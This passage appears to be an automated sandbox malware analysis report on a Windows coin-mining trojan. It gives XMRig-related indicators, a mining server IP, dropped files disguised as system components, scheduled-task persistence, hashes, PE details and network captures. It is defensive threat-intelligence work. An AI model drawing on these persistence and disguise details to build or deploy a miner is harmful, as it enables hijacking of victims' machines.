                  https://xmrig.com/wizardconhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameconhost.exe, 00000001.00000002.1725964191.000001575B3C1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://xmrig.com/wizard%sconhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://xmrig.com/docs/algorithmsconhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        212.47.253.124
                        		unknownFrance
                        		12876OnlineSASFRtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1545299
                        Start date and time:2024-10-30 11:41:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 55s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:19
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:boooba.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.mine.winEXE@26/5@1/1
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target nslookup.exe, PID 5480 because there are no executed function
                        • Execution Graph export aborted for target nslookup.exe, PID 6288 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: boooba.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        06:42:00API Interceptor7x Sleep call for process: conhost.exe modified
                        10:42:02Task SchedulerRun new task: IOAshdohSha path: C:\Users\user\IOAshdohSha.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        212.47.253.1242JkHiPgkLE.exeGet hashmaliciousXmrigBrowse
                          SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exeGet hashmaliciousXmrigBrowse
                            Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse
                              file.exeGet hashmaliciousXmrigBrowse
                                ekBTbONX85.exeGet hashmaliciousXmrigBrowse
                                  RPHbzz3JqY.exeGet hashmaliciousScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRATBrowse
                                    Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                                      2mim34IfQZ.exeGet hashmaliciousAsyncRAT, PureLog Stealer, Xmrig, zgRATBrowse
                                        8EbwkHzF0i.exeGet hashmaliciousXmrig, zgRATBrowse
                                          upw82ArDKW.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, XmrigBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            xmr-eu1.nanopool.org2HUgVjrn3O.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.58.224
                                            SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                            • 141.94.23.83
                                            Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                            • 54.37.232.103
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 54.37.137.114
                                            Q3Vq6yp33F.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.65.182
                                            2JkHiPgkLE.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.58.224
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 51.89.23.91
                                            eqkh9g37Yb.exeGet hashmaliciousXmrigBrowse
                                            • 146.59.154.106
                                            SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.65.182
                                            SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                            • 54.37.232.103

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            OnlineSASFRbelks.sh4.elfGet hashmaliciousMiraiBrowse
                                            • 62.210.152.252
                                            Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.193.130
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 163.172.154.142
                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                            • 51.159.148.50
                                            3HOhJoCrj5.elfGet hashmaliciousUnknownBrowse
                                            • 151.115.48.162
                                            yakuza.i686.elfGet hashmaliciousUnknownBrowse
                                            • 195.154.190.2
                                            1vocVfphyt.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                            • 163.172.24.191
                                            mips.elfGet hashmaliciousMiraiBrowse
                                            • 62.210.152.255
                                            https://zupimages.net/up/24/42/ol13.jpg?d6mSMvU0ZvpGwffnuqPHYMR7NvlxIzVjDfTD4YJjdRSCOccGet hashmaliciousUnknownBrowse
                                            • 51.158.28.82
                                            M3Llib2vh3.elfGet hashmaliciousMiraiBrowse
                                            • 62.210.152.202

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysSecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exeGet hashmaliciousXmrigBrowse
                                              2HUgVjrn3O.exeGet hashmaliciousXmrigBrowse
                                                SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                  Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                                    file.exeGet hashmaliciousXmrigBrowse
                                                      SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeGet hashmaliciousXmrigBrowse
                                                        prog.exeGet hashmaliciousXmrigBrowse
                                                          T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                            lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                              Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                                Download File
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):539
                                                                Entropy (8bit):5.356620128167825
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZaDAWDLI4MWuCv:ML9E4KQMsXE4Np/E4Ks
                                                                MD5:7155C0B26CEC4BA9E8198691F0343F69
                                                                SHA1:0C2D3811CBDA0C349203F9AAAEEF47E6DB4C0FEF
                                                                SHA-256:59691880D1C39E4698FA89EFDA67A8EA171A039B0F6FC332EBE911F7EE790E23
                                                                SHA-512:62A480C5AD8A978E41D29B6C03666D30569A0A7A1F8D92DA201CE839FE4578782EAEF5EF4B675306668F5813B71F2467B52AE090BDCF5313C276631DBD6E9379
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

                                                                Download File
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):14544
                                                                Entropy (8bit):6.2660301556221185
                                                                Encrypted:false
                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Joe Sandbox View:
                                                                • Filename: SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exe, Detection: malicious, Browse
                                                                • Filename: 2HUgVjrn3O.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, Detection: malicious, Browse
                                                                • Filename: Yf4yviDxwF.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, Detection: malicious, Browse
                                                                • Filename: prog.exe, Detection: malicious, Browse
                                                                • Filename: T52Z708x2p.exe, Detection: malicious, Browse
                                                                • Filename: lJ4EzPSKMj.exe, Detection: malicious, Browse
                                                                • Filename: Us051y7j25.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe

                                                                Download File
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):31744
                                                                Entropy (8bit):7.581390529189409
                                                                Encrypted:false
                                                                SSDEEP:384:IBTkWK8LeaODD7tHldY+vLkh5O89wv8x3MJyA5gs5ZSQiXW7m+ZdvB7Knwr+UP35:DqStDD7rk0gbihwSvBue+U/Hf
                                                                MD5:6A7E9885A2D01DF564B46F8F27258853
                                                                SHA1:2F57231A188226669FF74CF886A09572ED69025E
                                                                SHA-256:6BA3E42C8FA7DABE994E2793F369BAC914EA2E4949174FC2A0EFE4CBFEBE8171
                                                                SHA-512:84B4B84066A48DF6BD087679A75333C306C8F688679C508E171B14D5012711DE3A781CEA4D4C65DEBB694557DAFD66DBC359516451F700179D5C6806710CDF17
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........b......."........@.....................................h.......................................................0...<...................................................................................l................................text............................... ..`.rdata..n_...0...`..................@..@.bss.....................................pdata...............z..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\IOAshdohSha.exe

                                                                Download File
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2234368
                                                                Entropy (8bit):7.999661300763701
                                                                Encrypted:true
                                                                SSDEEP:24576:XRVlL9DqdKIEs0D7Vx1YPgZqkwBKmXXJj52antf0RsLrGaaFssusSWcaurrYL0Yv:h/GJ66PgUKUZkgtzGGsrzcdorJKJS
                                                                MD5:EF9E6A4BAB77A1E5ED51669EABEBA31D
                                                                SHA1:43B67B32D2FD462F0CB9277ED974D63A5575FC8C
                                                                SHA-256:AB41E347FEC54AF86EF8EDD98C695A7E856A93A30CD07A89D7669896B419B92B
                                                                SHA-512:8D3605E486F0CCB01D3022D54C57E8C65622272F5B477035469E45D3289973407F0584142B261A3FACA797E03412D182C376C2A2BA6970181E059982223AFE99
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P".....A.".....................................................0)".<............@".....................................................................l)"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\IOAshdohSha.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                Static File Info

                                                                General

                                                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Entropy (8bit):7.999661300763701
                                                                TrID:
                                                                • Win64 Executable (generic) (12005/4) 74.80%
                                                                • Generic Win/DOS Executable (2004/3) 12.49%
                                                                • DOS Executable Generic (2002/1) 12.47%
                                                                • VXD Driver (31/22) 0.19%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                File name:boooba.exe
                                                                File size:2'234'368 bytes
                                                                MD5:ef9e6a4bab77a1e5ed51669eabeba31d
                                                                SHA1:43b67b32d2fd462f0cb9277ed974d63a5575fc8c
                                                                SHA256:ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
                                                                SHA512:8d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99
                                                                SSDEEP:24576:XRVlL9DqdKIEs0D7Vx1YPgZqkwBKmXXJj52antf0RsLrGaaFssusSWcaurrYL0Yv:h/GJ66PgUKUZkgtzGGsrzcdorJKJS
                                                                TLSH:0DA53321FEBBB93FF56B817D9425415E20D1C9F4730630C7799E8A6E1B394A04BA0E36
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P".....A."....................................

                                                                File Icon

                                                                Icon Hash:90cececece8e8eb0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4022fa
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                DLL Characteristics:
                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:02549ff92b49cce693542fc9afb10102

                                                                Entrypoint Preview

                                                                Instruction
                                                                push ebp
                                                                dec eax
                                                                mov ebp, esp
                                                                dec eax
                                                                sub esp, 00000040h
                                                                dec eax
                                                                mov eax, 00000004h
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                dec ecx
                                                                mov eax, eax
                                                                mov eax, 00000000h
                                                                dec ecx
                                                                mov ebx, eax
                                                                dec eax
                                                                lea eax, dword ptr [ebp-04h]
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                dec esp
                                                                mov edx, ebx
                                                                call 00007FC94455F5E1h
                                                                dec eax
                                                                lea eax, dword ptr [FFFFFF98h]
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                call 00007FC94455F5FFh
                                                                mov eax, 00000001h
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                call 00007FC94455F5F7h
                                                                mov eax, 00030000h
                                                                dec ecx
                                                                mov ebx, eax
                                                                mov eax, 00010000h
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                dec esp
                                                                mov edx, ebx
                                                                call 00007FC94455F5E4h
                                                                dec eax
                                                                mov eax, dword ptr [00220624h]
                                                                dec eax
                                                                mov ecx, dword ptr [00220625h]
                                                                dec eax
                                                                mov edx, dword ptr [00220626h]
                                                                dec eax
                                                                mov dword ptr [ebp-10h], eax
                                                                dec eax
                                                                lea eax, dword ptr [ebp-04h]
                                                                dec eax
                                                                mov dword ptr [esp+20h], eax
                                                                mov eax, dword ptr [00221C17h]
                                                                dec ecx
                                                                mov ecx, eax
                                                                dec ecx
                                                                mov eax, edx
                                                                dec ecx
                                                                mov ebx, ecx
                                                                dec eax
                                                                mov eax, dword ptr [ebp-10h]
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                dec esp
                                                                mov edx, ebx
                                                                call 00007FC94455F5A9h
                                                                dec eax
                                                                mov eax, dword ptr [002205E1h]
                                                                dec eax
                                                                mov ecx, dword ptr [002205E2h]
                                                                dec eax
                                                                mov edx, dword ptr [002205E3h]

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2229300x3c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2240000x90.pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x22296c0x90.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x14e00x160088ad8c1be7e0f7eea949d01b2fe82d44False0.32759232954545453data5.398132007868387IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x30000x21fb6e0x21fc00b89fdc0ff2350f4568e5bd4e254e9ebaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .bss0x2230000xfac0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .pdata0x2240000x900x200833d670d56c423f97067d7571a397b78False0.17578125data1.2087156271204966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Imports

                                                                DLLImport
                                                                msvcrt.dllmalloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                                kernel32.dllSleep, CreateProcessA, SetUnhandledExceptionFilter

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-30T11:42:02.084648+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.449731212.47.253.12410300TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 30, 2024 11:42:10.645478964 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:10.650799990 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:10.650875092 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:10.651052952 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:10.656302929 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:10.854851961 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:10.860342979 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:10.860415936 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:10.860496998 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:10.865865946 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:11.470175982 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:11.522156000 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:11.695657015 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:11.740885973 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:17.592417955 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:17.693147898 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:17.756544113 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:17.772172928 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:27.434385061 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:27.647247076 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:27.867705107 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:28.093019009 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:28.093246937 CET4973010300192.168.2.4212.47.253.124
